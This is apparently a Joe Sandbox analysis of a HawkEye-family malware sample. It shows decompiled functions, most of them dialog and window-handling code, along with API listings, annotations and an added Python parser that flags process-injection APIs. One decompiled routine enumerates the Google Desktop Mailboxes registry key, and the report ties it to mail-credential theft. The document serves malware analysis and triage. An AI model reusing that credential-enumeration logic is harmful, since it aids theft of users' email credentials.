                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                        					L00412096();
                                                                                                                                                                        				}
                                                                                                                                                                        				_t23 =  *((intOrPtr*)(_t18 + 8));
                                                                                                                                                                        				if(_t23 != 0) {
                                                                                                                                                                        					E00406B8A(_t23);
                                                                                                                                                                        					_push(_t23);
                                                                                                                                                                        					L00412096();
                                                                                                                                                                        				}
                                                                                                                                                                        				_t24 =  *((intOrPtr*)(_t18 + 4));
                                                                                                                                                                        				if(_t24 != 0) {
                                                                                                                                                                        					E00406B8A(_t24);
                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                        					L00412096();
                                                                                                                                                                        				}
                                                                                                                                                                        				_t12 = _t18;
                                                                                                                                                                        				_t7 =  *((intOrPtr*)( *_t12))();
                                                                                                                                                                        				free( *_t7);
                                                                                                                                                                        				return _t7;
                                                                                                                                                                        			}

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086E8
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086F6
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408707
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 0040871E
                                                                                                                                                                          • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408727
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 0040875D
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00408770
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00408783
                                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00408796
                                                                                                                                                                        • free.MSVCRT(00000000), ref: 004087AA
                                                                                                                                                                          • Part of subcall function 00406B8A: free.MSVCRT(00000000,00406F4C,00000000,?,?), ref: 00406B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??3@$free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2241099983-0
                                                                                                                                                                        • Opcode ID: e4bd28fd36656b4f4febf186c9783447869cbd3f017b5df525af64530bfdf856
• Instruction ID: 36c0512d224ac042a94a08cc7a852a1772878ff9935cd33c5980a4446e7632c9
• Opcode Fuzzy Hash: e4bd28fd36656b4f4febf186c9783447869cbd3f017b5df525af64530bfdf856
• Instruction Fuzzy Hash: 8CF0A4729025306F89313B325A01A4EB7A47D5472932A026FF90ABB3858F7D6C60C5DD
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 19%
			// Dialog message handler: _a4 is the message, _a8 is wParam (an HDC for WM_CTLCOLOR* messages),
			// _a12 is lParam (the control's HWND for WM_CTLCOLOR* messages).
			E0040EE8B(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;                              // 0x110 == WM_INITDIALOG
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040EB15(__ecx, __ecx, __eflags);
					E0040649B(_t26,  *((intOrPtr*)(__ecx + 4)));
					L5:
					return E00401558(_t27, _a4, _a8, _a12);     // default handling for every other message
				}
				// 0x110 + 0x28 == 0x138 == WM_CTLCOLORSTATIC; E004062DB compares the control's
				// class name against "edit" (GetClassNameA + _stricmp, see the APIs list below).
				if(_t11 != 0x28 || E004062DB(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);                           // 1 == TRANSPARENT
					SetBkColor(_a8, GetSysColor(5));             // 5 == COLOR_WINDOW
					SetTextColor(_a8, 0xc00000);                 // COLORREF is 0x00BBGGRR: blue text
					return GetSysColorBrush(5);                  // COLOR_WINDOW brush for the control background
				}
			}

Instruction addresses shown beside the decompiled lines (0x00000000 marks lines without an instruction): 0x0040ee8b 0x0040ee91 0x0040ee97 0x0040ee99 0x0040eee2 0x0040eeea 0x0040eef0 0x00000000 0x0040eefb 0x0040ee9e 0x00000000 0x0040eead 0x0040eeb2 0x0040eec4 0x0040eed2 0x00000000 0x0040eeda

APIs
  • Part of subcall function 004062DB: memset.MSVCRT ref: 004062FB
  • Part of subcall function 004062DB: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
  • Part of subcall function 004062DB: _stricmp.MSVCRT(00000000,edit), ref: 00406320
• SetBkMode.GDI32(?,00000001), ref: 0040EEB2
• GetSysColor.USER32(00000005), ref: 0040EEBA
• SetBkColor.GDI32(?,00000000), ref: 0040EEC4
• SetTextColor.GDI32(?,00C00000), ref: 0040EED2
• GetSysColorBrush.USER32(00000005), ref: 0040EEDA
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Color$BrushClassModeNameText_stricmpmemset
• String ID:
• API String ID: 1869857563-0
• Opcode ID: fb94485f195de14578bb11bb35a76f110ea5450a675464f060a1de1235fa7123
• Instruction ID: 03c420b3e6d9e2244e0390b53f734bb3cf914c92d54749bbcb6c05866cd8fc50
• Opcode Fuzzy Hash: fb94485f195de14578bb11bb35a76f110ea5450a675464f060a1de1235fa7123
• Instruction Fuzzy Hash: 5BF08131140109BBDF116FA6EC09B9E3F69EF08712F10843AFA19641F1CB759A209B58
Uniqueness

Uniqueness Score: -1.00%
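A report like this one lists hundreds of dumped functions, each with its own "APIs" block in the format shown above (direct calls as `Api.MODULE(args), ref: addr`, calls made through a callee as `Part of subcall function X: ...`). When triaging, the question is rarely "what does this one GUI function do" but "which of the dumped functions touch the injection or credential APIs the summary signatures fired on". The parser below is an added example written for this page, not Joe Sandbox code; it reads the APIs block of E0040EE8B verbatim from the listing above, groups the direct calls by module, records which callees the subcall entries came from, and flags a short, assumed watch-list of process-injection APIs. The second input (`CONSTRUCTED_INJECTION`) is constructed for the example and does not come from this report; its addresses and arguments are hypothetical.

```python
"""Parse the per-function "APIs" block of a Joe Sandbox report listing.

Added example for this page; not part of Joe Sandbox or the analysed sample.
"""
import re
from collections import defaultdict

# Copied verbatim from the APIs block of E0040EE8B above.
SAMPLE_APIS = """\
• Part of subcall function 004062DB: memset.MSVCRT ref: 004062FB
• Part of subcall function 004062DB: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040630E
• Part of subcall function 004062DB: _stricmp.MSVCRT(00000000,edit), ref: 00406320
• SetBkMode.GDI32(?,00000001), ref: 0040EEB2
• GetSysColor.USER32(00000005), ref: 0040EEBA
• SetBkColor.GDI32(?,00000000), ref: 0040EEC4
• SetTextColor.GDI32(?,00C00000), ref: 0040EED2
• GetSysColorBrush.USER32(00000005), ref: 0040EEDA
"""

# Constructed input (NOT from this report): what an injection helper's block might look like.
CONSTRUCTED_INJECTION = """\
• VirtualAllocEx.KERNEL32(?,00000000,00001000,00003000,00000040), ref: 00401234
• WriteProcessMemory.KERNEL32(?,?,?,00001000,00000000), ref: 00401256
• CloseHandle.KERNEL32(?), ref: 00401270
"""

# Assumed watch-list for this example; extend to taste.
SUSPICIOUS = {
    "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
    "NtUnmapViewOfSection", "SetThreadContext", "ResumeThread",
}

# One bullet per line. The parenthesised argument list is optional: the
# "memset.MSVCRT ref: ..." entry above carries none, and then there is no
# comma before "ref:".
API_RE = re.compile(
    r"^\s*[•*]?\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_apis(text):
    """Return one dict per bullet; lines that do not match the format are skipped."""
    records = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        sub = m.group("sub")
        records.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),           # address of the call site
            "subcall": int(sub, 16) if sub else None,  # callee the call was inlined from
            "direct": sub is None,
        })
    return records


def by_module(records, direct_only=True):
    """Map module name -> list of API names, in listing order."""
    out = defaultdict(list)
    for r in records:
        if direct_only and not r["direct"]:
            continue
        out[r["module"]].append(r["api"])
    return dict(out)


def subcall_targets(records):
    """Addresses of callees whose API usage was folded into this function's block."""
    return {r["subcall"] for r in records if r["subcall"] is not None}


def flag_suspicious(records):
    """APIs from the watch-list that appear anywhere in the block (direct or via subcall)."""
    return {r["api"] for r in records if r["api"] in SUSPICIOUS}


if __name__ == "__main__":
    for name, text in (("E0040EE8B", SAMPLE_APIS), ("constructed", CONSTRUCTED_INJECTION)):
        recs = parse_apis(text)
        print(name, by_module(recs), sorted(hex(a) for a in subcall_targets(recs)),
              flag_suspicious(recs) or "no watch-list hits")
```

Run over E0040EE8B the watch-list comes back empty and the direct calls are all GDI32/USER32 drawing routines, which is consistent with this function being ordinary dialog painting code bundled into the sample rather than the HawkEye payload itself; the `subcall_targets` set (here just 004062DB) is what you would feed back into the report to pull the callee's own block.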

C-Code - Quality: 82%
			// WM_COMMAND handler: _a4 is HIWORD(wParam) (0 == menu, 1 == accelerator),
			// _a8 is LOWORD(wParam), the command ID; 0x9c41.. is decimal 40001.. .
			E0040B21F(intOrPtr __ecx, short _a4, short _a8) {
				char _v265;
				char _v520;
				char _v532;
				RECT* _v540;
				char _v560;
				intOrPtr _v564;
				char _v568;
				intOrPtr _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t54;
				void* _t77;
				short _t85;
				short _t86;
				RECT* _t97;
				intOrPtr _t104;

				_t93 = __ecx;
				_t97 = 0;
				_t104 = __ecx;
				_v564 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t85 = _a8;
					if(_t85 == 0x9c42) {
						_t54 = DestroyWindow( *(_t104 + 0x108));   // 40002: destroys the window whose handle is kept at +0x108
					}
					_t114 = _t85 - 0x9c49;
					if(_t85 == 0x9c49) {
						_t54 = E0040AFC4(_t93, _t97, _t104, _t114);
					}
					_t115 = _t85 - 0x9c59;
					if(_t85 == 0x9c59) {
						_t54 = E0040AF8A(_t97, _t104, _t115);
					}
					_t116 = _t85 - 0x9c56;
					if(_t85 == 0x9c56) {
						_t54 = E0040AECD(_t104, _t116);
					}
					if(_a8 == 0x9c58) {
						// toggle an option flag in the settings object at +0x36c, then re-apply settings
						 *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0xc) ^ 0x00000001;
						_t54 = E0040A3E9(0, _t93, _t104, 0);
					}
					if(_a8 == 0x9c44) {
						_t54 = E0040AEB7(_t104);
					}
					if(_a8 == 0x9c43) {
						_v532 = 0x414570;
						E004019DA(_t93,  &_v520, 0x4133fc);
						E004019DA(_t93,  &_v265, 0x413438);
						_t104 = _v564;
						_push( *(_t104 + 0x108));
						_push( &_v532);
						_t77 = 0x70;
						E004014EA(_t77);
						SetFocus( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
						_t20 =  &_v540; // 0x414570
						_t54 = E004013E7(_t20);
						_t97 = 0;
					}
					_t86 = _a8;
					_t122 = _t86 - 0x9c41;
					if(_t86 == 0x9c41) {
						_t54 = E0040AE52(_t104, _t93, _t122);
					}
					if(_t86 != 0x9c47) {
						L23:
						__eflags = _t86 - 0x9c4f;
						if(_t86 != 0x9c4f) {
							L27:
							__eflags = _t86 - 0x9c48;
							if(_t86 == 0x9c48) {
								_t54 = E0040ADA4(_t104, _t86);
							}
							__eflags = _t86 - 0x9c45;
							if(__eflags == 0) {
								_t100 = _t104 + 0x36c;
								 *( *(_t104 + 0x36c) + 4) =  *( *(_t104 + 0x36c) + 4) ^ 0x00000001;
								E0040A3E9(0, _t93, _t104, __eflags);
								_t93 = 1;
								_t54 = E0040A175( *((intOrPtr*)(_t104 + 0x370)), 1,  *((intOrPtr*)( *_t100 + 4)));
								_t97 = 0;
								__eflags = 0;
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t54 = E0040B1AF(_t104, __eflags, _t97);
							}
							__eflags = _a8 - 0x9c5c;
							if(_a8 == 0x9c5c) {
								 *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) =  *( *((intOrPtr*)(_t104 + 0x36c)) + 0x10) ^ 0x00000001;
								__eflags = 0;
								E0040A3E9(0, _t93, _t104, 0);
								E0040A5A1(_t104);
								_t54 = InvalidateRect( *( *((intOrPtr*)(_t104 + 0x370)) + 0x184), _t97, _t97);   // full repaint of the child window at +0x184
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t54 = E0040B1AF(_t104, __eflags, 1);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								_v540 = _t97;
								_v560 = 0x414028;
								E0040596A( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b4)),  &_v560,  *(_t104 + 0x108),  *( *((intOrPtr*)(_t104 + 0x370)) + 0x184));
								_v568 = 0x414028;
								_t54 = E004013E7( &_v560);
								_t104 = _v572;
							}
                                                                                                                                                                        							__eflags = _a8 - 0x9c4c;
                                                                                                                                                                        							if(_a8 == 0x9c4c) {
                                                                                                                                                                        								_t54 = E00408DAB( *((intOrPtr*)(_t104 + 0x370)));
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _a8 - 0x9c4e;
                                                                                                                                                                        							if(_a8 == 0x9c4e) {
                                                                                                                                                                        								_t54 = E00409DE2( *((intOrPtr*)(_t104 + 0x370)),  *(_t104 + 0x108));
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L43;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t72 + 0x1b8)) - _t97;
                                                                                                                                                                        						if( *((intOrPtr*)(_t72 + 0x1b8)) == _t97) {
                                                                                                                                                                        							_t54 = E004087BE(_t72, 0xffffffff, _t97, 2);
                                                                                                                                                                        							goto L27;
                                                                                                                                                                        						}
                                                                                                                                                                        						_push(0xf000);
                                                                                                                                                                        						_push(0x1000);
                                                                                                                                                                        						goto L21;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t72 =  *((intOrPtr*)(_t104 + 0x370));
                                                                                                                                                                        						if( *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x370)) + 0x1b8)) == _t97) {
                                                                                                                                                                        							_t54 = E004087BE(_t72, 0xffffffff, 2, 2);
                                                                                                                                                                        							goto L23;
                                                                                                                                                                        						}
                                                                                                                                                                        						_push(0xf000);
                                                                                                                                                                        						_push(0x2000);
                                                                                                                                                                        						L21:
                                                                                                                                                                        						_push(0xffffffff);
                                                                                                                                                                        						_t54 = E004087BE(_t72);
                                                                                                                                                                        						goto L43;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					L43:
                                                                                                                                                                        					return _t54;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

                                                                                                                                                                        0x0040b21f
                                                                                                                                                                        0x0040b22e
                                                                                                                                                                        0x0040b234
                                                                                                                                                                        0x0040b236
                                                                                                                                                                        0x0040b23a
                                                                                                                                                                        0x0040b247
                                                                                                                                                                        0x0040b250
                                                                                                                                                                        0x0040b258
                                                                                                                                                                        0x0040b258
                                                                                                                                                                        0x0040b25e
                                                                                                                                                                        0x0040b263
                                                                                                                                                                        0x0040b265
                                                                                                                                                                        0x0040b265
                                                                                                                                                                        0x0040b26a
                                                                                                                                                                        0x0040b26f
                                                                                                                                                                        0x0040b271
                                                                                                                                                                        0x0040b271
                                                                                                                                                                        0x0040b276
                                                                                                                                                                        0x0040b27b
                                                                                                                                                                        0x0040b27f
                                                                                                                                                                        0x0040b27f
                                                                                                                                                                        0x0040b28a
                                                                                                                                                                        0x0040b292
                                                                                                                                                                        0x0040b298
                                                                                                                                                                        0x0040b298
                                                                                                                                                                        0x0040b2a3
                                                                                                                                                                        0x0040b2a7
                                                                                                                                                                        0x0040b2a7
                                                                                                                                                                        0x0040b2b2
                                                                                                                                                                        0x0040b2bd
                                                                                                                                                                        0x0040b2c5
                                                                                                                                                                        0x0040b2d6
                                                                                                                                                                        0x0040b2db
                                                                                                                                                                        0x0040b2df
                                                                                                                                                                        0x0040b2e9
                                                                                                                                                                        0x0040b2ec
                                                                                                                                                                        0x0040b2ed
                                                                                                                                                                        0x0040b2fe
                                                                                                                                                                        0x0040b304
                                                                                                                                                                        0x0040b308
                                                                                                                                                                        0x0040b30d
                                                                                                                                                                        0x0040b30d
                                                                                                                                                                        0x0040b30f
                                                                                                                                                                        0x0040b313
                                                                                                                                                                        0x0040b318
                                                                                                                                                                        0x0040b31c
                                                                                                                                                                        0x0040b31c
                                                                                                                                                                        0x0040b326
                                                                                                                                                                        0x0040b357
                                                                                                                                                                        0x0040b357
                                                                                                                                                                        0x0040b35c
                                                                                                                                                                        0x0040b382
                                                                                                                                                                        0x0040b382
                                                                                                                                                                        0x0040b387
                                                                                                                                                                        0x0040b38b
                                                                                                                                                                        0x0040b38b
                                                                                                                                                                        0x0040b390
                                                                                                                                                                        0x0040b395
                                                                                                                                                                        0x0040b397
                                                                                                                                                                        0x0040b39f
                                                                                                                                                                        0x0040b3a5
                                                                                                                                                                        0x0040b3b7
                                                                                                                                                                        0x0040b3b8
                                                                                                                                                                        0x0040b3bd
                                                                                                                                                                        0x0040b3bd
                                                                                                                                                                        0x0040b3bd
                                                                                                                                                                        0x0040b3bf
                                                                                                                                                                        0x0040b3c5
                                                                                                                                                                        0x0040b3ca
                                                                                                                                                                        0x0040b3ca
                                                                                                                                                                        0x0040b3cf
                                                                                                                                                                        0x0040b3d5
                                                                                                                                                                        0x0040b3dd
                                                                                                                                                                        0x0040b3e1
                                                                                                                                                                        0x0040b3e3
                                                                                                                                                                        0x0040b3e8
                                                                                                                                                                        0x0040b3fb
                                                                                                                                                                        0x0040b3fb
                                                                                                                                                                        0x0040b401
                                                                                                                                                                        0x0040b407
                                                                                                                                                                        0x0040b40d
                                                                                                                                                                        0x0040b40d
                                                                                                                                                                        0x0040b412
                                                                                                                                                                        0x0040b418
                                                                                                                                                                        0x0040b420
                                                                                                                                                                        0x0040b429
                                                                                                                                                                        0x0040b443
                                                                                                                                                                        0x0040b44a
                                                                                                                                                                        0x0040b44e
                                                                                                                                                                        0x0040b453
                                                                                                                                                                        0x0040b453
                                                                                                                                                                        0x0040b457
                                                                                                                                                                        0x0040b45d
                                                                                                                                                                        0x0040b465
                                                                                                                                                                        0x0040b465
                                                                                                                                                                        0x0040b46a
                                                                                                                                                                        0x0040b470
                                                                                                                                                                        0x0040b47e
                                                                                                                                                                        0x0040b47e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b470
                                                                                                                                                                        0x0040b35e
                                                                                                                                                                        0x0040b364
                                                                                                                                                                        0x0040b36a
                                                                                                                                                                        0x0040b37d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b37d
                                                                                                                                                                        0x0040b36c
                                                                                                                                                                        0x0040b371
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b328
                                                                                                                                                                        0x0040b328
                                                                                                                                                                        0x0040b334
                                                                                                                                                                        0x0040b352
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b352
                                                                                                                                                                        0x0040b336
                                                                                                                                                                        0x0040b33b
                                                                                                                                                                        0x0040b340
                                                                                                                                                                        0x0040b340
                                                                                                                                                                        0x0040b342
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040b342
                                                                                                                                                                        0x0040b483
                                                                                                                                                                        0x0040b483
                                                                                                                                                                        0x0040b489
                                                                                                                                                                        0x0040b489

                                                                                                                                                                        APIs
                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 0040B258
                                                                                                                                                                        • SetFocus.USER32(?,?,?), ref: 0040B2FE
                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3FB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DestroyFocusInvalidateRectWindow
                                                                                                                                                                        • String ID: pEA
                                                                                                                                                                        • API String ID: 3502187192-660962052
                                                                                                                                                                        • Opcode ID: fa249e53f08e412b2de4fab2e63f274f7ae9770adcde098fbc7ff8254fc117ce
                                                                                                                                                                        • Instruction ID: b7bc1b810a9c946c48dae79992a2e7083b23304991c1a6466db7751271d6d75f
                                                                                                                                                                        • Opcode Fuzzy Hash: fa249e53f08e412b2de4fab2e63f274f7ae9770adcde098fbc7ff8254fc117ce
                                                                                                                                                                        • Instruction Fuzzy Hash: B75186306047019BCB20BF658845E9AB3E5FF50724F54C53FF8696B2E2C7799A818B8D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 91%
			// Window-message handler for the embedded password-recovery tool's main window
			// (this in ecx; _a4 = message, _a8 = wParam, _a12 = lParam). Message constants:
			// 5 = WM_SIZE, 0xf = WM_PAINT, 0x24 = WM_GETMINMAXINFO. Unhandled messages fall
			// through to E00401558.
			E00405CF8(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t29;
				struct HDWP__* _t30;
				RECT* _t58;
				intOrPtr _t66;

				_push(__ecx);
				_push(__ecx);
				_t66 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0x24) {
						if(_a4 == 0xf) {
							// WM_PAINT
							E004016E5(__ecx + 0xc);
						}
					} else {
						// WM_GETMINMAXINFO: _a12 is the MINMAXINFO*; offsets 0x18/0x1c are
						// ptMinTrackSize.x/.y, so the window cannot be shrunk below 400x180 pixels.
						_t29 = _a12;
						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
					}
				} else {
					// WM_SIZE: reposition eleven dialog controls (IDs 0x3ed-0x3f5, plus 1 = IDOK
					// and 2 = IDCANCEL) in one DeferWindowPos batch, then repaint the client area.
					// E00401645 resolves each ID with GetDlgItem and queues a DeferWindowPos.
					_t30 = BeginDeferWindowPos(0xb);
					_t58 = _t66 + 0xc;
					_v8 = _t30;
					E00401645(_t58, _t30, 0x3ed, 0, 0, 1);
					E00401645(_t58, _v8, 0x3ee, 0, 0, 1);
					E00401645(_t58, _v8, 0x3f4, 0, 0, 1);
					E00401645(_t58, _v8, 0x3ef, 0, 0, 1);
					E00401645(_t58, _v8, 0x3f0, 1, 0, 0);
					E00401645(_t58, _v8, 0x3f1, 1, 0, 0);
					E00401645(_t58, _v8, 0x3f5, 1, 0, 0);
					E00401645(_t58, _v8, 0x3f2, 1, 0, 0);
					E00401645(_t58, _v8, 0x3f3, 1, 1, 0);
					E00401645(_t58, _v8, 1, 1, 1, 0);
					E00401645(_t58, _v8, 2, 1, 1, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t58 + 0x10), _t58, 1);
					_t66 = _v12;
				}
				return E00401558(_t66, _a4, _a8, _a12);
			}

                                                                                                                                                                        0x00405cfb
                                                                                                                                                                        0x00405cfc
                                                                                                                                                                        0x00405d03
                                                                                                                                                                        0x00405d05
                                                                                                                                                                        0x00405d08
                                                                                                                                                                        0x00405dfd
                                                                                                                                                                        0x00405e16
                                                                                                                                                                        0x00405e1b
                                                                                                                                                                        0x00405e1b
                                                                                                                                                                        0x00405dff
                                                                                                                                                                        0x00405dff
                                                                                                                                                                        0x00405e02
                                                                                                                                                                        0x00405e09
                                                                                                                                                                        0x00405e09
                                                                                                                                                                        0x00405d0e
                                                                                                                                                                        0x00405d11
                                                                                                                                                                        0x00405d19
                                                                                                                                                                        0x00405d27
                                                                                                                                                                        0x00405d2d
                                                                                                                                                                        0x00405d3f
                                                                                                                                                                        0x00405d51
                                                                                                                                                                        0x00405d63
                                                                                                                                                                        0x00405d75
                                                                                                                                                                        0x00405d87
                                                                                                                                                                        0x00405d99
                                                                                                                                                                        0x00405dab
                                                                                                                                                                        0x00405dbd
                                                                                                                                                                        0x00405dcb
                                                                                                                                                                        0x00405dda
                                                                                                                                                                        0x00405de2
                                                                                                                                                                        0x00405ded
                                                                                                                                                                        0x00405df3
                                                                                                                                                                        0x00405df6
                                                                                                                                                                        0x00405e33

                                                                                                                                                                        APIs
                                                                                                                                                                        • BeginDeferWindowPos.USER32 ref: 00405D11
                                                                                                                                                                          • Part of subcall function 00401645: GetDlgItem.USER32 ref: 00401655
                                                                                                                                                                          • Part of subcall function 00401645: GetClientRect.USER32 ref: 00401667
                                                                                                                                                                          • Part of subcall function 00401645: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 004016D1
                                                                                                                                                                        • EndDeferWindowPos.USER32(?), ref: 00405DE2
                                                                                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 00405DED
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                        • String ID: $
                                                                                                                                                                        • API String ID: 2498372239-3993045852
                                                                                                                                                                        • Opcode ID: a57de8c45b3456a0d8c08563bdb03b3f45c34c184d4faa9fce82ec50ca54258b
                                                                                                                                                                        • Instruction ID: 9c87de9d9a27f98487306a7e65f23cb02f8420b0a21639e15617240473fc85a4
                                                                                                                                                                        • Opcode Fuzzy Hash: a57de8c45b3456a0d8c08563bdb03b3f45c34c184d4faa9fce82ec50ca54258b
                                                                                                                                                                        • Instruction Fuzzy Hash: CC314C30641254BBCB216F678C4DD8F7E7DEF86BA8F104479B406752A2D6758E00DAA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
			// Walks HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes and hands every
			// mailbox subkey to E004071D6. This is the registry access behind the report's
			// "Tries to steal Mail credentials (via file / registry access)" signature.
			// E0040F1B0 and E0040F276 behave like RegOpenKeyEx / RegEnumKeyEx wrappers:
			// they return 0 on success, the opened handle comes back through the last
			// argument, and that handle is later passed to RegCloseKey.
			E00407306(void* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;		// 256-byte subkey-name buffer (_v260 followed by 0xff bytes of _v259)
				char _v264;		// handle of the currently opened mailbox subkey
				void* _v268;	// handle of the Mailboxes key
				void* _v276;
				long _t17;
				void* _t21;
				void* _t24;
				void* _t29;
				int _t32;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t41;

				_t29 = __ecx;
				// 0x80000001 == HKEY_CURRENT_USER
				_t17 = E0040F1B0(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
				if(_t17 == 0) {
					_t32 = 0;		// subkey index
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_t40 = _t39 + 0xc;
					_t21 = E0040F276(_v268, 0,  &_v260);		// name of subkey 0 into _v260
					while(1) {
						_t41 = _t40 + 0xc;
						if(_t21 != 0) {
							break;		// enumeration exhausted (or failed)
						}
						_t24 = E0040F1B0(_v268,  &_v260,  &_v264);		// open Mailboxes\<name>
						_t40 = _t41 + 0xc;
						if(_t24 == 0) {
							E004071D6(_t29, _a4, _v264,  &_v260);		// process this mailbox key
							RegCloseKey(_v276);
						}
						_t32 = _t32 + 1;
						_t21 = E0040F276(_v268, _t32,  &_v260);		// next subkey name
					}
					_t17 = RegCloseKey(_v268);
				}
				return _t17;
			}

















APIs
  • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
• memset.MSVCRT ref: 00407341
  • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 0040738F
